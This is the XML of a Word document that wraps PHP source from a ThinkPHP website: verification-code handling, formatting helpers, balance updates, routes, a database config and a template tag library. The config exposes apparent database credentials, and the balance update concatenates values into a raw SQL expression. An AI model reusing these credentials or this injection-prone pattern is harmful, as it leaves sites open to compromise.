          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD4F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F7A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kMobile=Db::name('member_config')-&gt;where('name',$sdkMobile)-&gt;value('text');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E25BD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Send-&gt;sms([</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78E272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am'  =&gt; ["code"=&gt;"$code"],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2258CE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gt; $username,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43EA3E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late'  =&gt; $sdkMobile,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C624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05C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ult !== true){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="229E60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短信发送失败：</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'.$result;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30F32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B47F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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="124E6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code')-&gt;insert($where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64FBB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E6F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1D9DB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name</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>比较错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DCFD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BCDC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D67F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r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>模板通知内容获取错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29C94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4C3D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6CDB0B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A46A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codechecking($code='',$username=''){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="742E6E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de) return '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请输入验证码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="345E4A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name) return '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>请输入号码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206C4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email=false;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74E7D9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isMobile($username)){   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D9903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username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="723199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if(_isEmail($username)){   </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73D58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username;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6110F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47D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号码未知或格式错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>1';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A4EA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8486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 &amp;&amp; !$email) return '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>号码未知或格式错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>2';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38323B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de')-&gt;where(['code'=&gt;$code,'username'=&gt;$username])-&gt;find();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1A0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4280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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E7F46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手机验证码错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="13B301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email){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="555952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邮箱验证码错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EBF76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3229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验证码错误，请重新输入</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="097F34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12BB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B24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67D53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date=$db['time']+$db['maturity'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="792D94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me&gt;$jdate) return '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>验证码过期，请重发验证码</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B615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d5($db['code'])==md5($code) &amp;&amp; md5($db['username'])==md5($username)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3870D4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de')-&gt;where('id',$db['id'])-&gt;setField('type',1);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B9B4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1;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EC1D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DC8C5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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A5058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手机验证码错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375EB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email){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F9BB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邮箱验证码错误</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="758E2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8971E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验证码错误，请重新输入</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08755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D73B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00B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B0C73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obile($mobile){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="27AB0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bile){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6649A9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32EA6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1F4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ubstr($mobile,0,3).'****'.substr($mobile,7,4);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5831A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2D9D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B1AD4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mgUrl(){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F4C7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42A6D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3']['text'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="165D46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35A9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nArray($b,$a){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15ED7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b || !$a){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="510CA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E29CC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941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 as $value){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5098F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tolower($value) == strtolower($b)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="163F3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true;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="11DEB6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8189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329C7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E0C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01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videoDate($date){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10D2F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intval($date);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="083D69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e){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="370A6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4FD1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10C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e&lt;59){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40C987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00:'.$date;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E6DB1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151A0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our = floor($date/3600);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5381A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inute = floor(($date-3600*$hour)/60);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304CFF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inute&lt;10){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14F79F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inute="0".$minute;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA34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F26F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ond = floor((($date-3600*$hour)-60*$minute)%60);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209CC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econd&lt;10){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="39035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ond="0".$second;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4FC3A8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1909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inute.':'.$second;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B969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968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CAC7F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259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typeTid($tid) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="696E5C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t)$tid;  </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49EAF6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tid=Db::name('typeid')-&gt;where('tid',$tid)-&gt;field('id')-&gt;cache(_cache('db'))-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56030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tid){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C72A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ypetid as $k =&gt; $v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66AE6E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC97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typeTid($v['id']);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67E739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9D8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632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DD7BF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8DCB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userGuanzhuList($uid) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2742B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guanzhu')-&gt;where(['uid'=&gt;$uid])-&gt;field('gz_uid')-&gt;select();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45E9E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3A39FC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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D893C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v) {</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74DDF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v['gz_uid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02F03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856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user;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79537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6D2B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013D6C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C722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function _time($time){       </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3163C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p>
    <w:p w14:paraId="5BEE4E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 === NULL || $time &gt; time() ? time() : intval($time);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60521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 = time() - $time; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488F5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 = date('Y', $time)-date('Y', time());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D7147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witch($t){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3DDD5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 0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F220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刚刚</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08216C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552DD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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57092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t . '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>秒前</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">'; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15E06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E1A6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 * 60:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="358D09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floor($t / 60) . '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>分钟前</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">'; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7EAD1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058FE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 * 60 * 24:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0134A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floor($t / (60 * 60)) . '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>小时前</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve">'; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CB99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73962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 * 60 * 24 * 3:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F8C5D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floor($time/(60*60*24)) ==1 ?'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>昨天</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> ' . date('H:i', $time) : '</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>前天</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t xml:space="preserve"> ' . date('H:i', $time) ; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56F15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489D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 * 60 * 24 * 30:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36E14B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date('m-d H:i', $time); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C1D3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8980C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t &lt; 60 * 60 * 24 * 365&amp;&amp;$y==0:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C148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date('m-d', $time); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49F397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11A5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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B563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date('Y-m-d', $time); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="047C7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5DAC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445C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ext; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="242A5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5780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oneyDb($data){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1FDBF9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uid'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54F74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DEA2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889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ata['uid'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DB1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79E7E0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4FA355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48148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money'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57B66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money'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AF64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name['type'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25C58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p>
    <w:p w14:paraId="25195E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949E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p>
    <w:p w14:paraId="0487D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47A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name['money'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58EEED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exp','money'.$type.$money];;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61238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2AD34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_num'] = ['exp','money_num+'.$money];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="059AE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BAB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name['content'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CC93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content)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E2FC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ype=='+' ? '0' : '1';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ADD9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name('yaoqing_records')-&gt;insert(['uid'=&gt;$uid,'content'=&gt;$content ,'money'=&gt;$money,'data'=&gt;$datas,'time'=&gt;$time,'ip'=&gt;$ip]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51E09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148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A54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jinbi']['money'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA55E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data['jinbi'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65274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name['type'])){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F682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p>
    <w:p w14:paraId="48AF8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0888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p>
    <w:p w14:paraId="60D42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CA8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name['money'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0623F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jinbi'] = ['exp','jinbi'.$type.$money];;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D192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3932A0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jinbi_num'] = ['exp','jinbi_num+'.$money];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="664C8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2B4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name['content'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15561C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content)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="239DB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type=='+' ? '0' : '1';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C2AA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_records')-&gt;insert(['uid'=&gt;$uid,'content'=&gt;$content ,'money'=&gt;$money,'data'=&gt;$datas,'type'=&gt;1,'time'=&gt;$time,'ip'=&gt;$ip]);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B1D62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63A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052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where)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08816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794EB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2D8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gt;where('uid',$uid)-&gt;update($where);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C25C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236C9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84E56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oney($money){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="104EF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money)){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4168E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0.00';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C4E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E10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umber_format($money/100,2,'.',''); </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4E0D2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AD63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num($a){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="363A8D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 &gt; 10000){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7F5E1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round($a / 10000,2).'</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>万</w:t>
      </w:r>
      <w:r w:rsidRPr="008320C6">
        <w:rPr>
          <w:rFonts w:ascii="Calibri" w:eastAsia="宋体" w:hAnsi="Calibri" w:cs="Calibri"/>
          <w:szCs w:val="21"/>
        </w:rPr>
        <w:t>';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="57954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9E8E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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21CFC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BA52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8E72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67951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                       =&gt;                  'user/reg',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E8FC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wd/'                       =&gt;                  'user/password',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DE88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moneypay'                     =&gt;                  'member/moneypay',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6BC3E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article'                     =&gt;                  'member/article',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55F0CF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articleadd'                     =&gt;                  'member/articleadd',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="125295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favoritelist'                     =&gt;                  'member/favoritelist',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="05455B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mber/modify'                     =&gt;                  'member/modify',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50E374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nickname'                     =&gt;                  'member/nickname',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40E6F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mobile'                     =&gt;                  'member/mobile',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F12C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email'                     =&gt;                  'member/email',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D461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password'                     =&gt;                  'member/password',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="257B0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records'                     =&gt;                  'member/records',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7CFA97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out'                     =&gt;                  'member/out',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="349BF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F79D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0D45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4D7D9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mysql',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="65609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ostname'       =&gt; 'db',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4635D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ase'       =&gt; 'suxiangw',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2A73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gt; 'suxiangw',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46A9A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gt; 'suxiangw',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74C9A5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ostport'       =&gt; '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76DF7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sn'            =&gt; 'mysql:host=db;dbname=suxiangw',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75244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ams'         =&gt; [],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0ABD61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rset'        =&gt; 'utf8',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E42C2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fix'         =&gt; 'fx_',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="022FF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bug'          =&gt; true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="045B0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ploy'         =&gt; 0,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3336F4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w_separate'    =&gt; false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E5DF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ster_num'     =&gt; 1,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551FF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ave_no'       =&gt; '',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="47848F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s_strict'  =&gt; true,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43854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set_type' =&gt; 'array',</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B5356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o_timestamp' =&gt; false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77283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ql_explain'    =&gt; false,</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DB88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C0DC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8C6FA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lt;?php</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5479CD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FC7A0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reated by PhpStorm.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0855F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er: WANG</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6609C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ate: 2016-08-11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="217000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Time: 9:58</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60E053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0243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common\taglib;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="06D37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template\TagLib;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A1CE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1BCAB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Tag extends TagLib</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E0E69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9FD1F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BCEF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定义标签列表</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41335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5FFA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tags = [</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="220C8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ose' =&gt; ['attr' =&gt; 'time,format', 'close' =&gt; 0], </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5630E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 =&gt; ['attr' =&gt; 'name,type', 'close' =&gt; 1],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D167C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b' =&gt; ['attr' =&gt; 'name', 'close' =&gt; 0],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52BB4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v' =&gt; ['attr' =&gt; 'pid,limit,orderby'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74D3C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roduct' =&gt; ['attr' =&gt; 'cid,field,orderby,limit,pagesize'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ACCE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gt; ['attr' =&gt; 'cid,field,orderby,limit,pagesize,empty'],</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="218E5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chived' =&gt; ['close' =&gt; 1]</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D299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92A7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2ECA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这是一个闭合标签的简单演示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F102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D840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Close($tag)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="753AF2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7721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mat = empty($tag['format']) ? 'Y-m-d H:i:s' : $tag['format'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="023E9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empty($tag['time']) ? time() : $tag['time'];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36C08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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1424D2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echo date("' . $format . '",' . $time . ');';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="63AE4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 ?&gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="309C1C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701066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0F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4F00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这是一个非闭合标签的简单演示</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4CD9C7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C1FE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Open($tag, $content)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="024B3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666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empty($tag['type']) ? 0 : 1; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="66B7E6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 </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="381A9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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F23A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test_arr=[[1,3,5,7,9],[2,4,6,8,10]];'; </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="461BD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ist = think\Db::name(\'product\')-&gt;where(\'cid\',1)-&gt;select();';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="359D7B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__LIST__ = $list;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="75994F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gt;';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157F36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volist name="__LIST__" id="' . $name . '"}';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C552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79A4E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volist}';</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="465E85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332370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2DF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Web($tag){</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="106C6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28F070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2B0B6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6F5411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nk\Db::name('system')-&gt;where(['name'=&gt; 'site_$name'])-&gt;value('value');</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0731E6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name;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="206A50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29A076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0BF3D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247FA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9E51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F3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导航列表</w:t>
      </w:r>
    </w:p>
